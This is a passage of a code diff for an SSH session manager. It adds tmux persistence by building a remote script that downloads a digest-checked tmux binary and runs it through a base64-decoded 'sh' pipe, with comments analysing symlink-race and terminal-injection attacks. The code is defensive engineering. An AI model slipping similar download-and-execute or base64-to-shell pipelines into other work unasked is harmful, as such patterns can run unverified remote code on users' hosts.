+ * emits (`ok`/`fail=*` alike). pty-manager's parseTmuxStageSentinel requires
+ * an exact match before accepting any sentinel as this session's real
+ * reply -- SECOND layer only: an attacker who can also READ the tty (this
+ * line's own echo is not suppressed — see buildTmuxStageCommand's F7
+ * correction below) can copy the nonce verbatim and defeat this layer. What
+ * still holds in that case is NOT a path-pin on the reported value (#242
+ * finding F1(a), round-2 correction: this tier's `ok path=` field is no
+ * longer read for command construction AT ALL, by parser OR sink) -- it's
+ * that `buildTmuxLaunchCommand` (ssh-tmux.ts) embeds a fixed
+ * `STAGED_TMUX_BIN_EXPR` literal for a staged tier regardless of what this
+ * script's sentinel reports, so there is no wire-reported operand left for
+ * a tty-reader to substitute.
+ */
+export function buildTmuxStageScript(nonce: string): string {
+  // #242 finding F8: sink-side guard, run before any of these constants are
+  // interpolated into the remote-facing fragment below.
+  assertSafeTmuxStageConstants(nonce)
+  const releaseBase = tmuxReleaseBaseUrl()
+  const parts = [
+    `_u=$(uname -s 2>/dev/null)`,
+    `_m=$(uname -m 2>/dev/null)`,
+    `case "$_u-$_m" in ` +
+      `Linux-x86_64) _sfx=linux-x86_64;; ` +
+      `Linux-aarch64|Linux-arm64) _sfx=linux-arm64;; ` +
+      `Darwin-x86_64) _sfx=macos-x86_64;; ` +
+      `Darwin-arm64) _sfx=macos-arm64;; ` +
+      `*) _sfx="";; ` +
+    `esac`,
+    `if [ -z "$_sfx" ]; then echo "${TMUX_STAGE_SENTINEL_PREFIX} ${nonce} fail=arch"; else ` +
+      `case "$_sfx" in ` +
+        `linux-x86_64) _sha256=${TMUX_STAGE_SHA256['linux-x86_64']};; ` +
+        `linux-arm64) _sha256=${TMUX_STAGE_SHA256['linux-arm64']};; ` +
+        `macos-x86_64) _sha256=${TMUX_STAGE_SHA256['macos-x86_64']};; ` +
+        `macos-arm64) _sha256=${TMUX_STAGE_SHA256['macos-arm64']};; ` +
+      `esac; ` +
+      // #242 finding F6: same PREFIX/SUFFIX constants tmuxStageAssetUrl(arch)
+      // (host-side, called from pty-manager.ts's tier-4 downloader) builds
+      // its URL from -- only `$_sfx` (a shell variable here, a TS-side arch
+      // string there) differs between the two.
+      `_url="${releaseBase}/${TMUX_ASSET_FILENAME_PREFIX}$_sfx${TMUX_ASSET_FILENAME_SUFFIX}"; ` +
+      // MINOR fix (#242 round 2 adversarial review): the previous fallback
+      // (`echo /tmp/ccc-tmux-stage.$$`) is a PREDICTABLE path in a
+      // world-writable directory on a host without `mktemp` -- a co-tenant
+      // on a shared box can pre-create that exact path as a symlink before
+      // this runs, and `curl -o`/`wget -O` follow it, writing the download
+      // through to wherever the symlink points AS the SSH user. Falling
+      // back into `$HOME/.claude/bin/` instead (creating it first) keeps
+      // the temp file inside a directory only this user can write to, the
+      // same trust boundary the final install path already lives in.
+      `_tmp=$(mktemp 2>/dev/null || { mkdir -p "$HOME/.claude/bin" 2>/dev/null; echo "$HOME/.claude/bin/.ccc-tmux-stage.$$"; }); ` +
+      `(curl -fsSL "$_url" -o "$_tmp" 2>/dev/null || wget -qO- "$_url" > "$_tmp" 2>/dev/null); ` +
+      `if [ ! -s "$_tmp" ]; then rm -f "$_tmp"; echo "${TMUX_STAGE_SENTINEL_PREFIX} ${nonce} fail=download"; else ` +
+        `if command -v sha256sum >/dev/null 2>&1; then ` +
+          `echo "$_sha256  $_tmp" | sha256sum -c - >/dev/null 2>&1; _dgok=$?; ` +
+        `else ` +
+          `echo "$_sha256  $_tmp" | shasum -a 256 -c - >/dev/null 2>&1; _dgok=$?; ` +
+        `fi; ` +
+        `if [ "$_dgok" != "0" ]; then rm -f "$_tmp"; echo "${TMUX_STAGE_SENTINEL_PREFIX} ${nonce} fail=digest"; else ` +
+          `mkdir -p "$HOME/.claude/bin"; ` +
+          // Extract to a SIBLING temp file in the same directory, not
+          // straight at the install path -- `mv` (below) only replaces
+          // the live path once tar has confirmed success, so a failed or
+          // interleaved (concurrent-session) extract can never truncate or
+          // corrupt an already-installed tmux (#242 round 2 MAJOR fix; see
+          // the doc comment above).
+          `_dst="$HOME/.claude/bin/.tmux.$$"; ` +
+          `if tar -xzf "$_tmp" -O tmux > "$_dst" 2>/dev/null; then ` +
+            `chmod 755 "$_dst"; mv -f "$_dst" "$HOME/.claude/bin/tmux"; rm -f "$_tmp"; ` +
+            `_smoke="ccc-tmux-stage-smoke-$$"; ` +
+            `if "$HOME/.claude/bin/tmux" -V >/dev/null 2>&1 && "$HOME/.claude/bin/tmux" new-session -d -s "$_smoke" true; then ` +
+              `"$HOME/.claude/bin/tmux" kill-session -t "$_smoke" >/dev/null 2>&1; ` +
+              `echo "${TMUX_STAGE_SENTINEL_PREFIX} ${nonce} ok path=$HOME/.claude/bin/tmux"; ` +
+            `else ` +
+              // #242 round 2 BLOCKER fix: remove the binary the tier-2
+              // X_OK-only probe would otherwise keep finding and re-wrapping
+              // claude in on every later session to this host (see the doc
+              // comment above) -- the sentinel below still reports the
+              // failure, so this is reported removal, not silent removal.
+              `rm -f "$HOME/.claude/bin/tmux"; ` +
+              `echo "${TMUX_STAGE_SENTINEL_PREFIX} ${nonce} fail=terminfo"; ` +
+            `fi; ` +
+          `else ` +
+            `rm -f "$_dst" "$_tmp"; echo "${TMUX_STAGE_SENTINEL_PREFIX} ${nonce} fail=extract"; ` +
+          `fi; ` +
+        `fi; ` +
+      `fi; ` +
+    `fi`,
+  ]
+  return parts.join('; ')
+}
+
+/**
+ * Build the command pty-manager ACTUALLY writes to the remote PTY.
+ *
+ * #242 round-3 adversarial review, MAJOR FIX: `buildTmuxStageScript()`'s
+ * output (above) contains its own sentinel literals in plaintext
+ * (`ccc-tmux-stage ok path=...` / `fail=<reason>`). Writing that string
+ * directly to a PTY (as the round-2 version of this module did) means the
+ * remote tty's echo of the just-typed command -- not its eventual output --
+ * satisfies `parseTmuxStageSentinel`'s own regex, because the echoed line
+ * carries the exact same substrings. Depending on how the terminal wraps
+ * that ~2KB line (proved with \r\n injected at 80/100/120/132/160/200-column
+ * boundaries — see the regression test below), the echo either fails the
+ * `isSafeTmuxBin` allowlist (fail-closed, but wrong reason) or the parser
+ * mistakes it for the real completion sentinel outright -- either way
+ * `stagingDone` latches, `STAGE_TIMEOUT_MS` is cleared, and `writeClaudeCmd()`
+ * fires while curl is still mid-download: claude launches unwrapped and the
+ * tmux persistence #242 exists to deliver is silently lost, logged
+ * indistinguishably from a genuine download/digest/terminfo failure.
+ *
+ * Fix mirrors `getRemoteSetupCommand` (ssh-shim.ts:365-376), the repo's own
+ * precedent for this exact hazard: base64-encode the fragment and pipe it
+ * through `base64 -d | sh`, so the line the terminal echoes back while it is
+ * being TYPED is opaque base64 (`[A-Za-z0-9+/=]` only -- it cannot contain
+ * "ccc-tmux-stage", a space, or a line terminator, so no column-wrapping of
+ * the echo can ever satisfy the sentinel regex). The REAL sentinel is written
+ * by the decoded script's own `echo` once curl/tar/the smoke test actually
+ * finish running -- that is genuine command output, arriving strictly after
+ * the base64 line's echo, not a re-parse of the same bytes.
+ *
+ * #242 finding F7 correction: the `stty -echo … stty echo` bracket does NOT
+ * hide the ~2KB blob's OWN line from the terminal, and never did -- `stty
+ * -echo` is the FIRST statement of that SAME line, so by the time it takes
+ * effect the tty has already echoed the entire line, base64 blob included,
+ * back to the user. (An earlier version of this comment claimed otherwise.)
+ * What actually keeps the blob's content invisible/meaningless is the
+ * base64 opacity described above. The bracket earns its keep for a
+ * DIFFERENT window: whatever the user types WHILE the piped `sh` is
+ * decoding and running the script (a stray keypress mid-setup) is what it
+ * suppresses; `stty echo` restores normal echo once that run finishes.
+ */
+export function buildTmuxStageCommand(nonce: string): string {
+  const b64 = Buffer.from(buildTmuxStageScript(nonce)).toString('base64')
+  return `stty -echo 2>/dev/null; echo '${b64}' | base64 -d | sh; stty echo 2>/dev/null`
+}

--- a/src/main/ssh-tmux.ts
+++ b/src/main/ssh-tmux.ts
@@ -1,0 +1,247 @@
+/**
+ * ssh-tmux.ts — pure builder for the tmux launch wrapper that gives SSH
+ * Claude sessions reconnect-safe persistence (#242), extracted from
+ * pty-manager (mirroring the #241 ssh-args.ts pattern) so the argv/command
+ * shape is unit-testable without the full pty-manager dependency graph.
+ *
+ * `tmux new-session -A -s ccc-<safeSid> <cmd>` — `-A` means "attach if a
+ * session by this name already exists, else create it", so a fresh SSH
+ * connection and a reconnect run through the EXACT SAME command. There is
+ * no separate "reconnect" code path to keep in sync with the first launch.
+ *
+ * No default export (project convention).
+ */
+
+/**
+ * Allowlist for a tmux binary path (adversarial review, #242 BLOCKER).
+ *
+ * #242 round-3 correction (I3): the tier-1/2 `tmux=` sentinel field this
+ * guard used to gate (`setup ok ... tmux=(\S+)`, pty-manager.ts's
+ * parseTmuxSentinel) no longer carries a path at all -- generateRemoteSetupScript
+ * (ssh-shim.ts) now emits a fixed CLASS (`path`/`home`/`none`), and
+ * buildTmuxLaunchCommand below never reads a wire-reported path for either
+ * tier-1 or the staged tiers (see ON_PATH_TMUX_BIN_EXPR/STAGED_TMUX_BIN_EXPR).
+ * This allowlist's remaining job is the tier-3/4 stage/push "ok path=..."
+ * sentinel (parseTmuxStageSentinel, pty-manager.ts) -- a value kept ONLY for
+ * logging/diagnostics (buildTmuxLaunchCommand never reads it either), still
+ * raw remote PTY output an attacker able to write to the terminal (a
+ * MOTD/profile hook, another user's `wall`/`write` on a shared host) can
+ * plant. A DENYLIST for a value that ends up in log/IPC text must anticipate
+ * every metacharacter and a miss is silent; this mirrors the codebase's own
+ * precedent for the same shape of problem — `SAFE_REMOTE_PATH_RE` in
+ * ssh-shim.ts — which is an ALLOWLIST.
+ */
+export const SAFE_TMUX_BIN_RE = /^[A-Za-z0-9_./-]+$/
+
+/**
+ * Boolean form of the allowlist guard, for callers that need to degrade a
+ * hostile value safely (parseTmuxStageSentinel, pty-manager.ts) rather than
+ * throw.
+ */
+export function isSafeTmuxBin(tmuxBin: string): boolean {
+  return !tmuxBin.startsWith('-') && SAFE_TMUX_BIN_RE.test(tmuxBin)
+}
+
+/**
+ * The one and only path a LEGITIMATELY staged/pushed tmux binary can ever be
+ * at: `buildTmuxStageScript`/`buildTmuxPushControlScript` both install to
+ * this exact shell-expanded location (`$HOME/.claude/bin/tmux`), nowhere
+ * else. Round-2 correction (#242 finding F1(a)): an earlier version of this
+ * module accepted whatever path a tier-3/4 "ok" sentinel REPORTED, as long
+ * as it ended with "/.claude/bin/tmux" -- insufficient, because
+ * `mkdir -p /tmp/.claude/bin` succeeds for any co-tenant on a shared host, so
+ * both `/tmp/.claude/bin/tmux` and the double-slash `/tmp/x//.claude/bin/tmux`
+ * satisfy an ends-with test while pointing at attacker-controlled bytes
+ * (demonstrated end to end in adversarial review round 5, WITH a valid
+ * nonce). There is no ends-with/denylist fix for that -- "ends with the
+ * right suffix" and "is under the user's home" are different questions, and
+ * answering the second one for real would need a `realpath` round trip this
+ * app has no way to run before deciding what to write.
+ *
+ * The actual fix: for a staged tier, the remote-reported path is never
+ * trusted for command construction at all. `buildTmuxLaunchCommand` below
+ * embeds THIS literal token instead and lets the REMOTE shell expand
+ * `$HOME` for the account the SSH session actually authenticated as -- the
+ * sentinel that comes back over the wire then carries no
+ * attacker-controllable operand for the staged tier, so this control holds
+ * even against an attacker who can ALSO read the tty (can copy the nonce
+ * verbatim, but there is nothing left to substitute). `"$HOME"` is quoted
+ * (handles a home directory containing whitespace) while the fixed suffix
+ * is not (a compile-time literal with no shell metacharacters, safe
+ * unquoted) -- standard partial-quoting.
+ */
+export const STAGED_TMUX_BIN_EXPR = '"$HOME"/.claude/bin/tmux'
+
+/**
+ * #242 round-3 correction (I3): the tier-1/2 sibling of STAGED_TMUX_BIN_EXPR.
+ * `isPinnedTmuxPath`/`assertPinnedTmuxPath` used to let a validated-but-still
+ * wire-reported absolute path reach this sink for tier 1/2 (the "found on
+ * PATH" case) -- a validate-then-trust gate the two functions' own doc
+ * comments already admitted does NOT defeat an attacker-controlled absolute
+ * path with no traversal (e.g. "/tmp/.x/tmux"), because a real PATH tmux can
+ * legitimately live almost anywhere. Deleted rather than patched: the fix
+ * available for the staged tier (never read the wire value at all) applies
+ * here just as well. `command -v tmux` re-run on the remote, at launch time,
+ * by the SAME authenticated shell the setup probe ran in, answers the exact
+ * question tier 1 needs ("is tmux on this user's PATH") with no
+ * wire-reported operand in the sink at all -- generateRemoteSetupScript
+ * (ssh-shim.ts) now emits a CLASS (`path`/`home`/`none`), never a path, for
+ * exactly this reason. Quoted as a single command-substitution token so a
+ * PATH entry containing whitespace can't split the argument.
+ */
+export const ON_PATH_TMUX_BIN_EXPR = '"$(command -v tmux)"'
+
+/**
+ * Sanitize a CCC session id into a tmux-safe session name. Mirrors the
+ * `safeSid` rule in ssh-shim.ts (generateRemoteSetupScript / getSshSettingsPath)
+ * so the same sessionId maps to the same identifier everywhere it is
+ * embedded on the remote host, and so a session id containing shell
+ * metacharacters or spaces can't break out of the `-s <name>` argument.
+ */
+function safeSid(sessionId: string): string {
+  return sessionId.replace(/[^a-zA-Z0-9_-]/g, '_')
+}
+
+/**
+ * POSIX single-quote a shell argument: wrap in `'…'`, and for every literal
+ * `'` inside, close the quote, emit an escaped literal quote, reopen the
+ * quote (`'\''`). `innerCmd` is built from CCC-controlled/config-derived
+ * fragments (see writeClaudeCmd in pty-manager.ts) — this exists so a
+ * config value that happens to contain a single quote (e.g. --extra-args)
+ * can't break out of tmux's single argument.
+ */
+function singleQuote(str: string): string {
+  return `'${str.replace(/'/g, `'\\''`)}'`
+}
+
+export interface TmuxLaunchInput {
+  /** CCC session id — sanitized into the tmux session name `ccc-<safeSid>`. */
+  sessionId: string
+  /**
+   * #242 round-3 correction (I3): selects which entry of a fixed,
+   * host-authored literal table to embed as the leading token -- NEVER a
+   * value read off the wire. `true` for a tier-2/3/4 binary at (or staged
+   * to) `$HOME/.claude/bin/tmux` -- embeds `STAGED_TMUX_BIN_EXPR`. `false`
+   * for a tier-1 binary found on the remote's PATH -- embeds
+   * `ON_PATH_TMUX_BIN_EXPR` (`"$(command -v tmux)"`), which re-resolves PATH
+   * in the remote shell at launch time rather than trusting any
+   * remote-reported path string. Both literals are evaluated by the REMOTE
+   * shell in the authenticated user's own environment, so there is no
+   * attacker-controllable operand in this sink for either case (see
+   * generateRemoteSetupScript's `tmux=path|home|none` CLASS sentinel,
+   * ssh-shim.ts, and parseTmuxSentinel, pty-manager.ts, which is all this
+   * module now needs to know to pick between the two).
+   */
+  staged: boolean
+  /**
+   * The full inner command to run inside the tmux session — the CLAUDE_*
+   * env-var prefix followed by `claude` and its flags, exactly as
+   * pty-manager would have written it directly to the PTY without tmux.
+   * Passed as tmux's single `<shell-cmd>` argument (single-quoted) so
+   * tmux's `sh -c` carries the env vars through to claude — they must NOT
+   * be exported as separate tokens before the tmux binary token, because
+   * tmux's own launch environment does not come from this command line.
+   */
+  innerCmd: string
+}
+
+/**
+ * Build the tmux wrapper around a Claude launch command for an SSH session.
+ *
+ * Produces, for a tier-1 (`staged: false`) binary:
+ *   `"$(command -v tmux)" new-session -A -s ccc-<safeSid> '<innerCmd>'`
+ * and for a tier-2/3/4 (`staged: true`) binary:
+ *   `"$HOME"/.claude/bin/tmux new-session -A -s ccc-<safeSid> '<innerCmd>'`
+ * -- literally `ON_PATH_TMUX_BIN_EXPR` / `STAGED_TMUX_BIN_EXPR`, NEVER a
+ * value this function receives from the caller. #242 round-3 correction
+ * (I3): an earlier version took a `tmuxBin` string here for the `staged:
+ * false` case, validated it (`isPinnedTmuxPath`) against exactly the same
+ * "absolute, no traversal" shape STAGED_TMUX_BIN_EXPR's own doc comment
+ * already admitted was insufficient for the staged case -- a real PATH tmux
+ * can legitimately live almost anywhere, so that check could not rule out
+ * an attacker-controlled absolute path either. Deleted rather than patched:
+ * neither branch needs a wire-reported path at all. `isPinnedTmuxPath`/
+ * `assertPinnedTmuxPath` are gone with it.
+ *
+ * Statusline finding + decision (adversarial review, #242 MAJOR): once
+ * claude runs inside a tmux pane, its controlling terminal is the PTY tmux
+ * allocated for that PANE, not the outer ssh/sshd PTY the local Conductor
+ * reads from. The statusline shim's existing `/dev/tty` + ancestor-pts
+ * fallback (ssh-shim.ts) would land on that pane pty, and tmux does not
+ * relay an unrecognised OSC sequence from a pane to its client unless
+ * `allow-passthrough` is on AND the sequence is wrapped in tmux's DCS
+ * passthrough form — neither of which this codebase did before #242, so the
+ * statusline would silently stop updating for every SSH session the moment
+ * this wrapper shipped.
+ *
+ * DECISION: rather than opt in to allow-passthrough + DCS wrapping (fragile:
+ * depends on the remote's tmux version and config, and every future OSC use
+ * would need the same wrapping), the shim instead BYPASSES the pane pty
+ * entirely. When `$TMUX` is set, it asks the tmux server itself for
+ * `#{client_tty}` — the device path of the tty the ATTACHED CLIENT (the
+ * outer ssh session) is on — and writes the sentinel straight to that
+ * device. That is the same physical PTY the local Conductor already reads
+ * from pre-#242, so no tmux forwarding/passthrough is involved at all. See
+ * the `$TMUX` branch in SSH_STATUSLINE_SHIM (ssh-shim.ts).
+ */
+export function buildTmuxLaunchCommand(input: TmuxLaunchInput): string {
+  const sid = safeSid(input.sessionId)
+  const tmuxBinToken = input.staged ? STAGED_TMUX_BIN_EXPR : ON_PATH_TMUX_BIN_EXPR
+  return `${tmuxBinToken} new-session -A -s ccc-${sid} ${singleQuote(input.innerCmd)}`
+}
+
+/**
+ * Tier 5 degradation (#242): whether THIS write of the claude launch
+ * command should carry `--continue`.
+ *
+ * `--continue` resumes the most recent conversation for the launch cwd —
+ * the only way a user gets their conversation back on a reconnect when NO
+ * tmux tier (1-4) is in play, since without tmux the previous `claude`
+ * process (if the connection merely dropped rather than the process
+ * exiting) is gone and a fresh one starts with no history.
+ *
+ * `tmuxInPlay` gates this OFF, not just `reconnect` gating it ON: when a
+ * tmux binary is available, `buildTmuxLaunchCommand`'s `-A` already
+ * reattaches to whatever `claude` is still running inside the named
+ * session — that IS the reconnect path, and it needs no `--continue` at
+ * all. Adding it anyway would run a SECOND `claude` inside the SAME
+ * attached tmux pane (the first one, if still alive, never exited), which
+ * is wrong regardless of `reconnect`. See buildTmuxLaunchCommand's own doc
+ * comment for why `-A` makes reconnect and first-connect the identical
+ * command — this function is the deliberate exception to that story: the
+ * bare (non-tmux) launch has NO such single code path, so reconnect has to
+ * be signalled explicitly via a flag instead.
+ */
+export interface SshContinueFlagInput {
+  /** SSHOptions.reconnect (#242) — true when this spawn respawns a session
+   *  that had previously reached claude-running, set by the renderer. */
+  reconnect: boolean
+  /** True when THIS write wraps the launch in `tmux new-session -A`
+   *  (pty-manager's `tmuxWrapped`) — i.e. a usable binary was detected,
+   *  staged, or pushed for this session. */
+  tmuxInPlay: boolean
+}
+
+/**
+ * Pure predicate extracted so the gating logic is unit-testable without
+ * pty-manager's dependency graph (mirrors why buildTmuxLaunchCommand itself
+ * lives here rather than inline in pty-manager.ts). Both directions matter:
+ * dropping the `reconnect` check would add `--continue` to every bare
+ * first-connect launch (wrong — nothing to continue yet); dropping the
+ * `!tmuxInPlay` check would add it even when `-A` already reattaches
+ * (wrong — a second claude in an already-live pane).
+ */
+export function shouldAddContinueFlag(input: SshContinueFlagInput): boolean {
+  return input.reconnect && !input.tmuxInPlay
+}
+
+/**
+ * Build the extra claude CLI flags (currently just `--continue`, when
+ * applicable) pty-manager appends to the bare (non-tmux-wrapped) launch
+ * command on a write. Returns `''` when nothing should be added, so callers
+ * can splice it in with the same `filter(Boolean).join(' ')` shape the rest
+ * of pty-manager's claudeFlags assembly already uses.
+ */
+export function buildSshClaudeFlags(input: SshContinueFlagInput): string {
+  return shouldAddContinueFlag(input) ? '--continue' : ''
+}

--- a/src/preload/index.ts
+++ b/src/preload/index.ts
@@ -83,6 +83,10 @@ export interface ElectronAPI {
         username: string
         remotePath: string
         postCommand?: string
+        /** #242 tier 5: respawning a session that previously reached
+         *  claude-running -- drives `--continue` when no tmux persistence
+         *  is available. See SSHOptions.reconnect in pty-manager.ts. */
+        reconnect?: boolean
       }
       configId?: string
       configLabel?: string

--- a/src/renderer/components/SshFlowOverlay.tsx
+++ b/src/renderer/components/SshFlowOverlay.tsx
@@ -1,4 +1,5 @@
 import React, { useEffect, useState } from 'react'
+import { isSshPersistenceFailureReason, formatPersistenceUnavailableMessage } from '../../shared/ssh-tmux-persistence'
 
 interface Props {
   sessionId: string
@@ -210,6 +211,19 @@ export default function SshFlowOverlay({ sessionId, hasPostCommand, shellOnly, e
               Skip
             </button>
           </div>
+        </div>
+      )}
+      {/* #242 tier 5: every tmux-ladder tier that gave up already forwards its
+          reason onto this SAME 'running-claude' info field (tmux-stage-fail:*,
+          tmux-push-fail:*, or the probe=none default) -- this was previously
+          rendered nowhere, so the ladder degrading to a bare claude launch was
+          indistinguishable from it succeeding. Shown only for the narrow
+          'running-claude' window before the idle-fallback latches
+          claude-running and the whole overlay unmounts (see the hide check
+          above) -- brief, but the alternative was never showing it at all. */}
+      {state === 'running-claude' && isSshPersistenceFailureReason(info) && (
+        <div className="text-yellow text-[11px] leading-snug mb-1">
+          {formatPersistenceUnavailableMessage(info!)}
         </div>
       )}
       {isRunning && (

--- a/src/renderer/components/TerminalView.tsx
+++ b/src/renderer/components/TerminalView.tsx
@@ -154,6 +154,13 @@ export default function TerminalView({ sessionId, configId, cwd, shellOnly, elev
     if (!ssh) return
     return window.electronAPI.ssh.onFlowState(sessionId, (msg) => {
       if (msg.state !== 'claude-running') return
+      // #242 tier 5: latch "this session has reached claude-running at
+      // least once" so a LATER respawn (Restart after a dropped
+      // connection) can pass SSHOptions.reconnect -- read back in doSpawn
+      // below. Set unconditionally on every claude-running emit (already
+      // idempotent: setting true to true is a no-op re-render at worst),
+      // not just the first, since no earlier code path clears it.
+      updateSession(sessionId, { sshReachedClaudeRunning: true })
       if (document.querySelector('[role="dialog"][aria-modal="true"]')) return
       // requestAnimationFrame so React has time to unmount the overlay
       // and yield the focus stack before we grab it.
@@ -161,7 +168,7 @@ export default function TerminalView({ sessionId, configId, cwd, shellOnly, elev
         try { terminalRef.current?.focus() } catch { /* ignore */ }
       })
     })
-  }, [sessionId, ssh])
+  }, [sessionId, ssh, updateSession])
 
   // Restore terminal focus when the WINDOW regains focus (#145).
   //
@@ -550,8 +557,15 @@ export default function TerminalView({ sessionId, configId, cwd, shellOnly, elev
               resumeNudgesLeft = 3
               resumeNudgeGated = true
             }
+            // #242 tier 5: `reconnect` is computed here, not carried on the
+            // `ssh` prop itself -- it reflects THIS session's own history
+            // (sshReachedClaudeRunning, latched by the flow-state
+            // subscription above), not anything the caller configured.
+            // Merging it into a copy of `ssh` keeps that prop's shape a
+            // pure reflection of the session's SAVED config.
+            const sshWithReconnect = ssh ? { ...ssh, reconnect: !!session?.sshReachedClaudeRunning } : ssh
             window.electronAPI.pty
-              .spawn(sessionId, { cwd, cols, rows, ssh, shellOnly, elevated, terminalOptions, configId, configLabel, useResumePicker, legacyVersion, agentsConfig, effortLevel, permissionMode, extraArgs, disableAutoMemory, enableCodexReview, loggingEnabled, model, provider, codexOptions, profileId: resolvedProfileId, resume })
+              .spawn(sessionId, { cwd, cols, rows, ssh: sshWithReconnect, shellOnly, elevated, terminalOptions, configId, configLabel, useResumePicker, legacyVersion, agentsConfig, effortLevel, permissionMode, extraArgs, disableAutoMemory, enableCodexReview, loggingEnabled, model, provider, codexOptions, profileId: resolvedProfileId, resume })
               .catch((err: unknown) => {
                 // BUG-2: spawn was fire-and-forget, so a main-process throw (e.g.
                 // "Codex CLI not found on PATH") became a silent unhandled

--- a/src/renderer/stores/sessionStore.ts
+++ b/src/renderer/stores/sessionStore.ts
@@ -116,6 +116,18 @@ export interface Session {
   /** True only for an in-progress add-account login shell; drives the /login
    *  guidance banner. Cleared once the account is detected. */
   needsLogin?: boolean
+  /** #242 tier 5: true once this SSH session's flow state has reached
+   *  `claude-running` at least once. Set by TerminalView's flow-state
+   *  subscription, read at the NEXT spawn to compute SSHOptions.reconnect
+   *  (drives `--continue` when no tmux persistence tier is in play).
+   *  Mirrors effortLive/fastMode's lifecycle: never persisted (see
+   *  session-persistence.ts's explicit field allowlist) -- a session
+   *  restored after a full app relaunch starts with this unset, so its
+   *  first post-relaunch spawn is correctly NOT treated as a reconnect.
+   *  Survives an in-app Restart (forceRemount merges the live store record
+   *  without clearing it), which is the actual respawn path this exists
+   *  for. */
+  sshReachedClaudeRunning?: boolean
   codexOptions?: CodexOptions
   // Optional per-session GitHub integration state. Hydrated from SavedSession
   // on restore so the panel can gate on the per-session `enabled` flag instead

--- a/src/renderer/types/electron.d.ts
+++ b/src/renderer/types/electron.d.ts
@@ -162,6 +162,10 @@ export interface ElectronAPI {
         remotePath: string
         postCommand?: string
         dockerContainer?: string
+        /** #242 tier 5: respawning a session that previously reached
+         *  claude-running -- drives `--continue` when no tmux persistence
+         *  is available. See SSHOptions.reconnect in pty-manager.ts. */
+        reconnect?: boolean
       }
       shellOnly?: boolean
       elevated?: boolean

--- a/src/shared/ssh-tmux-persistence.ts
+++ b/src/shared/ssh-tmux-persistence.ts
@@ -1,0 +1,95 @@
+// src/shared/ssh-tmux-persistence.ts
+//
+// #242 tier 5: the SSH tmux-persistence ladder (tiers 1-4, main process:
+// ssh-tmux.ts / ssh-tmux-stage.ts / ssh-tmux-push.ts) already threads its
+// failure reason onto the `running-claude` flow state's `info` field, over
+// the EXISTING `ssh:flowState:<sessionId>` IPC channel (emitSshFlowState in
+// pty-manager.ts) -- that part shipped with tiers 1-4. What was missing is
+// this module + SshFlowOverlay.tsx actually SHOWING it: the reason reached
+// the renderer already, but the renderer silently dropped it on the floor
+// and rendered "Launching Claude..." either way. That silent drop -- not a
+// missing wire -- is the "failing silently" this tier closes.
+//
+// Pure + dependency-free so both the main process (which produces the
+// reasons) and the renderer (which recognises and formats them) import the
+// SAME literals rather than each hand-typing its own copy that can drift.
+// No default export (project convention).
+
+/**
+ * Reasons pty-manager's tmux ladder can hand to `running-claude`'s `info`
+ * field once every tier has given up and the launch falls through to a
+ * bare (unwrapped) claude command:
+ *   - `probe=none` -- writeClaudeCmd resolved with no explicit reason AND
+ *     no usable tmux binary was ever detected for this session (defence-in-
+ *     depth default; see pty-manager.ts's writeClaudeCmd doc comment).
+ *   - `tmux-stage-fail:<reason>` -- tier 3 (curl/wget staging,
+ *     ssh-tmux-stage.ts) failed; `<reason>` is one of
+ *     arch/download/digest/extract/terminfo/timeout/build-error.
+ *   - `tmux-push-fail:<reason>` -- tier 4 (base64 push over the PTY,
+ *     ssh-tmux-push.ts) failed; same reason vocabulary plus `aborted`.
+ * `terminfo` (a binary that installed but can't open a terminal — no
+ * terminfo database on the remote) is the one reason both tiers 3 and 4
+ * can report, called out separately in the #242 plan because it is the
+ * likeliest real-world hit on egress-less minimal containers, not because
+ * it needs different handling here.
+ */
+export const SSH_PERSISTENCE_PROBE_NONE = 'probe=none'
+const SSH_PERSISTENCE_FAIL_PREFIXES = ['tmux-stage-fail:', 'tmux-push-fail:'] as const
+
+/**
+ * Whether a `running-claude` flow state's `info` string names a tmux-
+ * persistence failure the overlay should surface, as opposed to `info`
+ * being unset (persistence succeeded, tmux is in play) or carrying some
+ * OTHER stage's info value (e.g. `'inner'` on `awaiting-claude`, which this
+ * predicate must not mistake for a failure).
+ */
+export function isSshPersistenceFailureReason(info: string | undefined): boolean {
+  if (!info) return false
+  if (info === SSH_PERSISTENCE_PROBE_NONE) return true
+  return SSH_PERSISTENCE_FAIL_PREFIXES.some((prefix) => info.startsWith(prefix))
+}
+
+/**
+ * The one-line message SshFlowOverlay renders in place of silently showing
+ * nothing when `isSshPersistenceFailureReason(info)` is true. `reason` is
+ * the raw `info` string verbatim -- it is main-process-controlled (never
+ * renderer/user input), so no escaping/formatting is applied beyond the
+ * template itself.
+ *
+ * M6 (adversarial review round 5): `terminfo` (a tmux binary that installed
+ * but can't open a terminal — no terminfo database on the remote) gets
+ * plain-language treatment rather than the raw token verbatim. #242's own
+ * plan called this the likeliest real-world hit on egress-less minimal
+ * containers, not because it needs different LOGIC here (the failure is
+ * handled identically to any other reason upstream), but because
+ * "tmux-stage-fail:terminfo" / "tmux-push-fail:terminfo" means nothing to a
+ * user who has never heard of a terminfo database.
+ */
+export function formatPersistenceUnavailableMessage(reason: string): string {
+  if (reason === 'tmux-stage-fail:terminfo' || reason === 'tmux-push-fail:terminfo') {
+    return `persistent session unavailable: the remote host has no terminfo database, so tmux can't open a terminal there — conversation will resume via --continue on reconnect`
+  }
+  return `persistent session unavailable: ${reason} — conversation will resume via --continue on reconnect`
+}
+
+/**
+ * pty-manager's writeClaudeCmd (ssh branch) calls this to resolve what
+ * `running-claude`'s `info` field should carry. `explicitReason` is
+ * whatever a tier-3/4 sentinel handler already determined
+ * (`tmux-stage-fail:<reason>` / `tmux-push-fail:<reason>`) -- always used
+ * verbatim when present, REGARDLESS of `tmuxInPlay` (a stage/push failure
+ * reason is meaningful even in the -- currently impossible, but not
+ * guaranteed forever -- case where some future tier still wraps in tmux
+ * after reporting one). When there is no explicit reason, `tmuxInPlay`
+ * decides: `true` means detection actually succeeded (no failure to
+ * report, `undefined`); `false` defaults to `probe=none` rather than
+ * silently emitting `running-claude` with no info at all. Extracted as a
+ * pure function (not left inline in writeClaudeCmd) so both directions of
+ * that default are independently unit-testable.
+ */
+export function resolveRunningClaudeInfo(
+  explicitReason: string | undefined,
+  tmuxInPlay: boolean,
+): string | undefined {
+  return explicitReason ?? (tmuxInPlay ? undefined : SSH_PERSISTENCE_PROBE_NONE)
+}

--- a/tests/unit/main/pty-handlers-sessionid.test.ts
+++ b/tests/unit/main/pty-handlers-sessionid.test.ts
@@ -1,0 +1,47 @@
+// tests/unit/main/pty-handlers-sessionid.test.ts
+//
